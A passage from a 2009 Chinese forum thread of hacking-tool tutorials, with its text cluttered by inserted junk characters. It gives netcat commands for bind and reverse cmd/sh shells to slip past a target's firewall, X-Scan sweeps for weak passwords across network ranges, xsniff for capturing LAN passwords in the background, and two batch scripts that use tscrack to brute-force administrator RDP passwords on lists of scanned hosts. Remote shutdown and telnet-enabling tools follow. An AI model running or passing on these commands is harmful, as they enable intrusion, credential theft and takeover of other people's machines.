    -t 使用Telnet交互方式- `; c0 v' u) n/ z2 M. d( f
    -u UDP模式# `% p. @( n- C, m- J* I2 v/ w/ q
    -v 详细输出,用-vv将更详细# @2 {' [# ]# w. t1 c
    -w数字 timeout延时间隔9 \; Y/ t) a, D" V
    -z 将输入,输出关掉(用于扫锚时)
    ' Q2 j  [3 _0 t) l基本用法:
    # K' u9 J' V! @. l# _* E" ]5 r+ bnc -nvv 192.168.0.1 80 连接到192.168.0.1主机的80端口! ^$ k+ \! V% Y. P" X6 Z: t1 G4 l
    nc -l -p 80 开启本机的TCP 80端口并监听
    ( q* J- t( f) y% A1 h" O0 lnc -nvv -w2 -z 192.168.0.1 80-1024 扫锚192.168.0.1的80-1024端口
    : {+ v" h+ K9 t4 O/ s! }nc -l -p 5354 -t -e c:winntsystem32cmd.exe 绑定remote主机的cmdshell在remote的TCP 5354端口
    # y: }) O; N* f% T% v# G) pnc -t -e c:winntsystem32cmd.exe 192.168.0.2 5354 梆定remote主机的cmdshell并反向连接192.168.0.2的5354端口; y: W& P9 d3 |+ R: n
    高级用法:! R0 H& [7 y* a, U! L
    nc -L -p 80 作为蜜罐用1:开启并不停地监听80端口,直到CTR+C为止
    : P1 ^4 ?$ g! ~( y' J+ |nc -L -p 80 > c:log.txt 作为蜜罐用2:开启并不停地监听80端口,直到CTR+C,同时把结果输出到c:log.txt
    2 n% X/ n2 ~6 V5 R, wnc -L -p 80 < c:honeyport.txt 作为蜜罐用3-1:开启并不停地监听80端口,直到CTR+C,并把c:honeyport.txt中内容送入管道中,亦可起到传送文件作用% b7 s4 D$ k6 ?! j5 t
    type.exe c:honeyport | nc -L -p 80 作为蜜罐用3-2:开启并不停地监听80端口,直到CTR+C,并把c:honeyport.txt中内容送入管道中,亦可起到传送文件作用
    - p. j9 g% p# a本机上用:nc -l -p 本机端口
    # K+ g' |; ^- l% P8 ~+ b在对方主机上用:nc -e cmd.exe 本机IP -p 本机端口 *win2K+ h. `- e7 i, Y- W
    nc -e /bin/sh 本机IP -p 本机端口 *linux,unix 反向连接突破对方主机的防火墙; R) M2 \- \- u) R# t. s( l
    本机上用:nc -d -l -p 本机端口 < 要传送的文件路径及名称
    2 w( m7 \. b+ d) s, p在对方主机上用:nc -vv 本机IP 本机端口 > 存放文件的路径及名称 传送文件到对方主机
    , q- R, [+ P" l4 ?- v+ }. [备 注:
      \; Z& F6 A+ }% T! E| 管道命令- K0 T6 u  E5 ~+ f4 k
    < 或 > 重定向命令。“<”,例如:tlntadmn < test.txt 指把test.txt的内容赋值给tlntadmn命令
    . z7 a) t5 n; e6 C- A# T  f4 W) X+ e@ 表示执行@后面的命令,但不会显示出来(后台执行);例:@dir c:winnt >> d:log.txt 意思是:后台执行dir,并把结果存在d:log.txt中/ s+ P: k7 z, t: A+ ]8 i- j" V0 y
    >与>>的区别  ">"指:覆盖;">>"指:保存到(添加到)。9 i* m3 t& d2 K3 }6 ~$ B  \2 s
    如:@dir c:winnt >> d:log.txt和@dir c:winnt > d:log.txt二个命令分别执行二次比较看:用>>的则是把二次的结果都保存了,而用:>则只有一次的结果,是因为第二次的结果把第一次的覆盖了。* i/ O- U" I- J2 c
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    开心
    2014-7-28 21:47
  • 签到天数: 2 天

    [LV.1]初来乍到

    8
     楼主| 发表于 2009-5-4 09:37:30 | 只看该作者
    八:
    3 `+ H3 V3 o) Z& r" j* ?2、扫锚工具:xscan.exe& l! W9 ~/ G; i
    基本格式
    ) S" Q4 R& u; _' \( _xscan -host <起始IP>[-<终止IP>] <检测项目> [其他选项] 扫锚"起始IP到终止IP"段的所有主机信息* Q: Z2 X6 P" ?2 J" \" P3 d9 V
    xscan -file <主机列表文件名> <检测项目> [其他选项] 扫锚"主机IP列表文件名"中的所有主机信息
    / g. Q5 i: c4 c2 h7 I7 q检测项目
    2 n- e' w. R5 M2 X7 c* Z-active 检测主机是否存活  L6 T! B, h  G5 ?; ~
    -os 检测远程操作系统类型(通过NETBIOS和SNMP协议)
    5 |0 p; s) y4 n/ Z-port 检测常用服务的端口状态
    - c' Z: p; A1 p-ftp 检测FTP弱口令
    6 H# F# b7 C& ^1 P5 R-pub 检测FTP服务匿名用户写权限
    9 f2 G) y% b- s. a. r9 h-pop3 检测POP3-Server弱口令
    # r6 `- E, m' C( l7 z-smtp 检测SMTP-Server漏洞
    * z5 z! W# p3 }/ u/ L4 Z1 d-sql 检测SQL-Server弱口令4 O) I9 G% R" ^  L- N: k9 |- E
    -smb 检测NT-Server弱口令
    ) N0 d6 R% z* ^9 t-iis 检测IIS编码/解码漏洞
    . _3 J6 }" e0 I' A# p-cgi 检测CGI漏洞# |! O9 ^" N) p" f2 J5 H
    -nasl 加载Nessus攻击脚本
    ! ]3 U6 S( T1 G% m0 }9 A-all 检测以上所有项目
    # b- M# m* R! h7 X( q其它选项
    5 e+ X% i( v  {0 V4 N-i 适配器编号 设置网络适配器, <适配器编号>可通过"-l"参数获取
      P9 m% }1 m2 R# o* F-l 显示所有网络适配器* h' h  G1 U( h8 o9 U- f$ A" K3 _
    -v 显示详细扫描进度4 A5 k, s9 P2 `- f) C
    -p 跳过没有响应的主机% A" i7 U6 W/ n" d% |5 }" S
    -o 跳过没有检测到开放端口的主机6 N6 F) H  U6 D2 s+ K1 V7 u
      -t 并发线程数量,并发主机数量 指定最大并发线程数量和并发主机数量, 默认数量为100,10
    % v$ u7 n. A- g" V, W+ R-log 文件名 指定扫描报告文件名 (后缀为:TXT或HTML格式的文件)! d1 r+ S$ @0 Z5 F# n9 _, {
    用法示例6 E' m/ e1 ~3 J, e
    xscan -host 192.168.1.1-192.168.255.255 -all -active -p  检测192.168.1.1-192.168.255.255网段内主机的所有漏洞,跳过无响应的主机
    ) w  f8 K5 E* u" d/ S0 W3 uxscan -host 192.168.1.1-192.168.255.255 -port -smb -t 150 -o 检测192.168.1.1-192.168.255.255网段内主机的标准端口状态,NT弱口令用户,最大并发线程数量为150,跳过没有检测到开放端口的主机% X* s& f# N7 O3 A$ ]1 E, s1 O
    xscan -file hostlist.txt -port -cgi -t 200,5 -v -o 检测“hostlist.txt”文件中列出的所有主机的标准端口状态,CGI漏洞,最大并发线程数量为200,同一时刻最多检测5台主机,显示详细检测进度,跳过没有检测到开放端口的主机6 E3 d4 g* |3 I! H
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    开心
    2014-7-28 21:47
  • 签到天数: 2 天

    [LV.1]初来乍到

    9
     楼主| 发表于 2009-5-4 09:38:18 | 只看该作者
    九:
    2 L/ [. Q# o6 c( E0 m3、命令行方式嗅探器: xsniff.exe- a/ [3 w8 w+ X' n, w+ n$ j
    可捕获局域网内FTP/SMTP/POP3/HTTP协议密码
    ( A0 @1 H' q) c# h2 n/ [. j参数说明, F, Y. q4 }3 i9 H
    -tcp 输出TCP数据报
      t! v' ?& A9 ^8 e-udp 输出UDP数据报) s5 V& H% f) h8 ?5 t. r9 f7 `
    -icmp 输出ICMP数据报
    ) g( ?) m& O5 `2 w-pass 过滤密码信息
    ! U) N! N7 U; z" V-hide 后台运行5 I8 C1 y0 {) s; N6 f8 o- c5 g
    -host 解析主机名
    0 B1 Y7 L/ z* s9 }-addr IP地址 过滤IP地址% P6 \% ~; j* z: U1 c
    -port 端口 过滤端口
    & [! i9 Z- Z0 s( D-log 文件名 将输出保存到文件% r, I* O4 _$ o; R$ p6 M
    -asc 以ASCII形式输出, i0 Q2 i- T5 G  u8 q& R  i) w
    -hex 以16进制形式输出
    + ~4 U8 F9 |# t1 R& c8 Y" Y用法示例0 {) Y( p5 M  c: l5 p; N
    xsniff.exe -pass -hide -log pass.log 后台运行嗅探密码并将密码信息保存在pass.log文件中& X  O+ _4 h$ _
    xsniff.exe -tcp -udp -asc -addr 192.168.1.1 嗅探192.168.1.1并过滤tcp和udp信息并以ASCII格式输出
    6 |+ a* m5 A9 O9 a, q. X0 p, O4、终端服务密码破解: tscrack.exe
    7 A9 A4 P( I" C5 I2 }1 c参数说明
    - _* u! V  f/ S- p2 j-h 显示使用帮助* r" A- t% S+ B1 [- T( g$ Z
    -v 显示版本信息$ n0 M% S& v1 b' u" O) n
    -s 在屏幕上打出解密能力
    / L- i2 ]" X  {-b 密码错误时发出的声音
      }, x. l( n. \7 b+ Q7 n/ [-t 同是发出多个连接(多线程)
    5 d* C& {& L1 q-N Prevent System Log entries on targeted server
    * u  }) \$ ~, ]' l; Y# q! w3 c' z-U 卸载移除tscrack组件
    * r4 _) {- Q  ?! q( L-f 使用-f后面的密码
    7 ?0 x& q. ]& l5 j/ G2 \* D7 j-F 间隔时间(频率)
    . y4 |" Z& v8 ^-l 使用-l后面的用户名2 N/ c: l& G4 N- b. H' X( N
    -w 使用-w后面的密码字典6 ~, I5 J) n6 i$ G, X
    -p 使用-p后面的密码
    " k4 M% e6 E2 q3 o-D 登录主页面
    " Y) A% S  Z; m用法示例7 F' y% k7 ]9 L0 p" V
    tscrack 192.168.0.1 -l administrator -w pass.dic 远程用密码字典文件暴破主机的admi9 @  d/ ?. d, c
    nistrator的登陆密码
    + t+ n$ f/ E9 b7 K5 w# Jtscrack 192.168.0.1 -l administrator -p 123456 用密码123456远程登陆192.168.0.1的administrator用户( i4 A! r% `0 `' u# ^
    @if not exist ipcscan.txt goto noscan
    , Y: T9 Y* [; w2 v# i' U5 i, I& P@for /f "tokens=1 delims= " %%i in (3389.txt) do call hack.bat %%i
    / W0 E$ G" ]: S6 _1 ]nscan3 _, S/ d+ n- }
    @echo 3389.txt no find or scan faild
    3 `; U0 C8 ^- C/ K# M, p. r0 T(①存为3389.bat) (假设现有用SuperScan或其它扫锚器扫到一批开有3389的主机IP列表文件3389.txt)
    ) V1 @3 D# x4 d  G1 A3389.bat意思是:从3389.txt文件中取一个IP,接着运行hack.bat% W4 o9 I! Z. s0 J! `8 e4 y
    @if not exist tscrack.exe goto noscan3 B( f2 @, C5 L+ ~0 x1 x+ F
    @tscrack %1 -l administrator -w pass.dic >>rouji.txt2 {7 M2 w$ I5 O
    :noscan* K3 m# z" V/ E' Y
    @echo tscrack.exe no find or scan faild$ P0 Y7 v5 C0 K
    (②存为hack.bat) (运行3389.bat就OK,且3389.bat、hack.bat、3389.txt、pass.dic与tscrack.exe在同一个目录下;就可以等待结果了)) @5 [0 o1 o4 Y$ E, ]. _
    hack.bat意思是:运行tscrack.exe用字典暴破3389.txt中所有主机的administrator密码,并将破解结果保存在rouji.txt文件中。( G4 i9 r' E/ t3 E# [6 T9 [
    5、其它:
    9 p% P/ s( J1 J, d6 ~# G6 oShutdown.exe
    ) T$ m7 d9 S7 s$ G- p- KShutdown IP地址 t:20 20秒后将对方NT自动关闭(Windows 2003系统自带工具,在Windows2000下用进就得下载此工具才能用。在前面Windows 2003 DOS命令中有详细介绍。)
      I# ~' S2 B! V6 T# }% ^fpipe.exe (TCP端口重定向工具) 在第二篇中有详细说明(端口重定向绕过防火墙)
    9 n+ h( q0 B4 c5 j, g6 A2 bfpipe -l 80 -s 1029 -r 80 www.sina.com.cn 当有人扫锚你的80端口时,他扫到的结果会完全是www.sina.com.cn的主机信息' t0 M' O/ `! R4 O
    Fpipe -l 23 -s 88 -r 23 目标IP 把本机向目标IP发送的23端口Telnet请求经端口重定向后,就通过88端口发送到目标IP的23端口。(与目标IP建立Telnet时本机就用的88端口与其相连接)然后:直接Telnet 127.0.0.1(本机IP)就连接到目标IP的23端口了。
    ! C/ f2 A% }% i: B8 _; POpenTelnet.exe (远程开启telnet工具), e7 I1 x/ R- F7 H, l) e% x
    opentelnet.exe IP 帐号 密码 ntlm认证方式 Telnet端口 (不需要上传ntlm.exe破坏微软的身份验证方式)直接远程开启对方的telnet服务后,就可用telnet ip 连接上对方。/ v3 P) ^! t- [8 F
    NTLM认证方式:0:不使用NTLM身份验证;1:先尝试NTLM身份验证,如果失败,再使用用户名和密码;2:只使用NTLM身份验证。
    + ?# e' U1 G; l0 d9 n/ ?; a+ nResumeTelnet.exe (OpenTelnet附带的另一个工具)( d. Q5 }1 ^" [) i3 @
    resumetelnet.exe IP 帐号 密码 用Telnet连接完对方后,就用这个命令将对方的Telnet设置还原,并同时关闭Telnet服务。
    5 |, D% k, T7 x2 L
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    开心
    2014-7-28 21:47
  • 签到天数: 2 天

    [LV.1]初来乍到

    10
     楼主| 发表于 2009-5-4 09:38:47 | 只看该作者
    十:
    ; P! u2 l8 U2 [0 V( ?6、FTP命令详解:
    ! E0 h: a4 e' s; ~FTP命令是Internet用户使用最频繁的命令之一,熟悉并灵活应用FTP的内部命令,可以大大方便使用者,并收到事半功倍之效。如果你想学习使用进行后台FTP下载,那么就必须学习FTP指令。6 H4 W  n( A9 n, p
    FTP的命令行格式为:/ n7 j0 s( n0 e: a3 |" w) I8 |7 c: r
    ftp -v -d -i -n -g [主机名] ,其中
    . S2 g' b9 Q- o$ J5 r-v 显示远程服务器的所有响应信息
    - y/ }$ |5 T. C, e& @4 C-n 限制ftp的自动登录,即不使用;.n etrc文件;" l4 A$ k  E2 O' q: Z
    -d 使用调试方式;
    / B( Y" l4 k, ]) l, m-g 取消全局文件名。
    " _# \/ z% B4 f0 i6 xFTP使用的内部命令如下(中括号表示可选项):
    8 e- U( W6 n1 w; f" |" X4 z' V1.![cmd[args]]:在本地机中执行交互shell,exit回到ftp环境,如:!ls*.zip- D" F1 T3 e) A9 b( L, S
    2.$ macro-ame[args]: 执行宏定义macro-name。
    7 l9 w. X) x* ]; _3.account[password]: 提供登录远程系统成功后访问系统资源所需的补充口令。7 W) L/ A9 w2 ~. B2 x. A4 C5 f2 g
    4.append local-file[remote-file]:将本地文件追加到远程系统主机,若未指定远程系统文件名,则使用本地文件名。' z! G+ Y) {. s+ k1 X
    5.ascii:使用ascii类型传输方式。
    ! n  W- [0 T8 c6.bell:每个命令执行完毕后计算机响铃一次。5 q- r2 i& H7 R
    7.bin:使用二进制文件传输方式。  q$ R: o) f, l
    8.bye:退出ftp会话过程。; d  r* A: U1 n& T, C+ w/ w7 [
    9.case:在使用mget时,将远程主机文件名中的大写转为小写字母。$ X' {) r1 d: |4 m) n# ^
    10.cd remote-dir:进入远程主机目录。6 R  B4 A. d9 H$ _9 v4 n% t
    11.cdup:进入远程主机目录的父目录。
    " G6 H; K4 ~" }0 p4 k6 |12.chmod mode file-name:将远程主机文件file-name的存取方式设置为mode,如:chmod 777 a.out。
    % A7 W* H9 K' L# W13.close:中断与远程服务器的ftp会话(与open对应)。5 G; z/ Y8 o9 R: c4 f
    14.cr:使用asscii方式传输文件时,将回车换行转换为回行。# r$ f8 i) q6 L* n" ]2 H
    15.delete remote-file:删除远程主机文件。0 A3 s; x+ u* M& A2 @& W
    16.debug[debug-value]:设置调试方式, 显示发送至远程主机的每条命令,如:deb up 3,若设为0,表示取消debug。
    8 a* }2 f: M" C5 W6 W3 Q3 o5 h- S17.dir[remote-dir][local-file]:显示远程主机目
    回复 支持 反对

    使用道具 举报

    本版积分规则

    关闭

    下沙大学生网推荐上一条 /1 下一条

    快速回复 返回顶部 返回列表